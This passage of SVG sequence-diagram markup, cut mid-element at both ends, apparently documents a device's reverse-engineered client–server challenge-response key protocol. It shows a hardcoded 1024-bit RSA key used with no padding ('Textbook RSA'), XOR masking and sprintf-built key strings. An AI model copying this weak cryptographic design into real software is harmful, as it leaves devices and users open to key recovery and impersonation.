stroke="none" x="78.071376402" y="415.71835844399993" width="237.42358865648438" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="430.7970076439999" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="445.8756568439999" width="431.0902680388086" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="460.95430604399985" width="415.44025888353514" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="476.0329552439998" width="228.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="491.1116044439998" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="506.19025364399977" width="323.1735834112756" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="399.131844324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Produce a 32-byte-long message called </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="374.9165172878594" y="399.131844324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="414.21049352399996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">that the Server will decrypt with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="321.91650202907033" y="414.21049352399996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="496.88316157496877" y="414.21049352399996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="429.28914272399993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded public key.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="444.3677919239999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="459.4464411239999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">It seems that the Client is expected to encrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="427.06651118434377" y="459.4464411239999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">with the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.88317683375783" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PRIVATE KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="250.0998440090508" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> that corresponds to the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="431.81650355494924" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PUBLIC</text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="80.333173782" y="489.6037395239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.333173782" y="489.6037395239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hardcoded on the device.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="504.6823887239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="519.7610379239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="220.04983332789845" y="519.7610379239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="394.3164959255547" y="519.7610379239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 52.688983582 525.792497604 L 120.54290498200001 525.792497604 L 120.54290498200001 545.394741564 L 72.64306269 545.394741564" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(60.228308182,545.394741564) translate(-60.228308182,-545.394741564)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 72.793849182 539.111971064 L 60.228308182 545.394741564 L 72.793849182 551.677512064 Z"/></g></g><g><g><rect fill="white" stroke="none" x="156.10059441169236" y="568.012715364" width="292.6235894194238" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="158.36239179169235" y="581.583499644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="199.99572690521774" y="581.583499644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="374.262389502874" y="581.583499644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Server</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 60.228308182 587.614959324 L 532.1817155528086 587.614959324" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(544.5964700608085,587.614959324) translate(-544.5964700608085,-587.614959324)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 532.0309290608085 581.332188824 L 544.5964700608085 587.614959324 L 532.0309290608085 593.897729824 Z"/></g></g><g><g><rect fill="white" stroke="none" x="585.0575120808086" y="610.232933124" width="457.07358255296873" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="625.311582324" width="320.67358865648436" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Decrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="650.1693079349296" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ENCRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="824.4359705325859" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="864.9026377078789" y="623.803717404" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="638.882366604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="728.8859751102226" y="638.882366604" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 559.6751192608085 644.913826284 L 627.5290406608085 644.913826284 L 627.5290406608085 664.516070244 L 579.6291983688085 664.516070244" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(567.2144438608085,664.516070244) translate(-567.2144438608085,-664.516070244)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 579.7799848608086 658.2332997440001 L 567.2144438608085 664.516070244 L 579.7799848608086 670.798840744 Z"/></g></g><g><g><rect fill="white" stroke="none" x="592.5968366808086" y="687.1340440440001" width="312.47360696703123" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="592.5968366808086" y="702.2126932440001" width="367.3069309225671" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="592.5968366808086" y="717.2913424440001" width="319.1569260588281" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="594.8586340608085" y="700.7048283240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Generate a string of 31 random, printable</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="594.8586340608085" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">characters (between ASCII codes </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="841.9252997102226" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x21</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="878.6086340608085" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="915.5419684113945" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">0x7e</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="951.9253035249199" y="715.7834775240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="594.8586340608085" y="730.8621267240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">and store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="765.1752997102226" y="730.8621267240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 567.2144438608085 736.8935864040001 L 635.0683652608085 736.8935864040001 L 635.0683652608085 756.4958303640001 L 587.1685229688085 756.4958303640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(574.7537684608085,756.4958303640001) translate(-574.7537684608085,-756.4958303640001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 587.3193094608085 750.2130598640001 L 574.7537684608085 756.4958303640001 L 587.3193094608085 762.778600864 Z"/></g></g><g><g><rect fill="white" stroke="none" x="600.1361612808087" y="779.113804164" width="425.3069313994043" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="794.192453364" width="409.67358865648436" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="809.271102564" width="364.4569291105859" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="824.349751764" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="839.4284009639999" width="400.72359170824217" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Encrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="663.4812907225762" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="807.7979563719903" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="848.2646235472832" y="792.684588444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_encrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="807.763237644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded, 1024-bit public RSA key, with the</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="602.3979586608086" y="822.841886844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_NO_PADDING</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="749.9479617125664" y="822.841886844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> option set ("Textbook RSA").</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="837.920536044" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="852.9991852439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the 128-byte result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="812.8646182067071" y="852.9991852439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 574.7537684608085 859.0306449240001 L 642.6076898608086 859.0306449240001 L 642.6076898608086 878.6328888840001 L 594.7078475688086 878.6328888840001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(582.2930930608086,878.6328888840001) translate(-582.2930930608086,-878.6328888840001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 594.8586340608086 872.3501183840001 L 582.2930930608086 878.6328888840001 L 594.8586340608086 884.915659384 Z"/></g></g><g><g><rect fill="white" stroke="none" x="132.88757376611133" y="901.250862684" width="369.2069291105859" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="135.14937114611132" y="914.821646964" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send 128-byte </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="247.53270244493945" y="914.821646964" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="433.2660398472832" y="914.821646964" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> to Client</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 567.2144438608085 920.853106644 L 80.18238729 920.853106644" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(67.76763278199999,920.853106644) translate(-67.76763278199999,-920.853106644)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 80.33317378199999 914.5703361440001 L 67.76763278199999 920.853106644 L 80.33317378199999 927.135877144 Z"/></g></g><g><g><rect fill="white" stroke="none" x="600.1361612808087" y="943.4710804440001" width="354.3735918036096" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="958.5497296440001" width="369.65692796617674" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="600.1361612808087" y="973.628378844" width="135.99026431947877" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="602.3979586608086" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="636.9479578978692" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="641.6146244055901" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="785.9312900550042" y="957.0418647240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> with the first 31 bytes</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="972.1205139240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">of </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="621.2146262175713" y="972.1205139240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DECRYPTED_XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="795.7979544646416" y="972.1205139240001" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and store the result in</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="602.3979586608086" y="987.199163124" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="729.1979617125664" y="987.199163124" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 582.2930930608086 993.2306228040001 L 642.6076898608086 993.2306228040001 L 642.6076898608086 1012.8328667640001 L 594.7078475688086 1012.8328667640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(582.2930930608086,1012.8328667640001) translate(-582.2930930608086,-1012.8328667640001)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 594.8586340608086 1006.5500962640001 L 582.2930930608086 1012.8328667640001 L 594.8586340608086 1019.115637264 Z"/></g></g><g><g><rect fill="white" stroke="none" x="93.150025602" y="1035.450840564" width="339.22359743028807" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1050.529489764" width="295.4069260588281" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1065.6081389639999" width="321.3236001959436" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1080.6867881639998" width="320.07358255296873" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1095.7654373639998" width="343.94026651292967" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="93.150025602" y="1110.8440865639998" width="174.80692615419557" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="95.411822982" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">If</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="107.26182336346973" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> the Client possesses the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="295.8784920646416" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PRIVATE KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="401.09515923993456" y="1049.021624844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, or,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1064.100274044" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">perhaps, a database of such keys, each</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1079.1789232439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">indexed by an </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="203.74515885846483" y="1079.1789232439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="407.54516191022265" y="1079.1789232439999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1094.2575724439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">then they may now proceed to decrypt the</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1109.3362216439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">CHALLENGE_CIPHERTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="281.14516038434374" y="1109.3362216439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> and store  the result</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="95.411822982" y="1124.4148708439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="116.71182221906055" y="1124.4148708439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">SECRET_PLAINTEXT</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="261.0284878684746" y="1124.4148708439998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 67.76763278199999 1130.4463305240001 L 135.621554182 1130.4463305240001 L 135.621554182 1150.048574484 L 87.72171189000001 1150.048574484" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(75.30695738200001,1150.048574484) translate(-75.30695738200001,-1150.048574484)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 87.872498382 1143.765803984 L 75.30695738200001 1150.048574484 L 87.872498382 1156.331344984 Z"/></g></g><g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1172.6665482839999" width="249.39026346117188" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1187.7451974839998" width="460.2569293013208" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1202.8238466839998" width="430.456932448446" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1217.9024958839998" width="100.89026346117187" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1232.9811450839998" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="607.6754858808087" y="1248.0597942839997" width="184.54025735765626" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1186.2373325639999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Create two new strings by calling</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="609.9372832608086" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="671.9872824978692" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_TEMP_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="787.5872809719903" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="803.6706149411065" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="827.1039473843438" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+TEMP</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="879.1539466214043" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="895.2372805905205" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1022.0372836422783" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1028.7372834515436" y="1201.3159817639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, and</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="609.9372832608086" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">sprintf(</text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="671.9872824978692" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RAW_PERM_KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="788.820618374334" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">, "</text><text fill="purple" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="804.9039523434502" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">%s</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="828.3372847866875" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">+PERM</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="881.6206176113946" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">", </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="897.7039515805108" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">MASKED_SECRET</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="1024.5039546322687" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">)</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="1031.2039544415338" y="1216.3946309639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1231.4732801639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">respectively. </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1246.5519293639998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="609.9372832608086" y="1261.6305785639997" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">(Note the format string.)</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 582.2930930608086 1267.662038244 L 650.1470144608086 1267.662038244 L 650.1470144608086 1287.264282204 L 602.2471721688086 1287.264282204" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(589.8324176608086,1287.264282204) 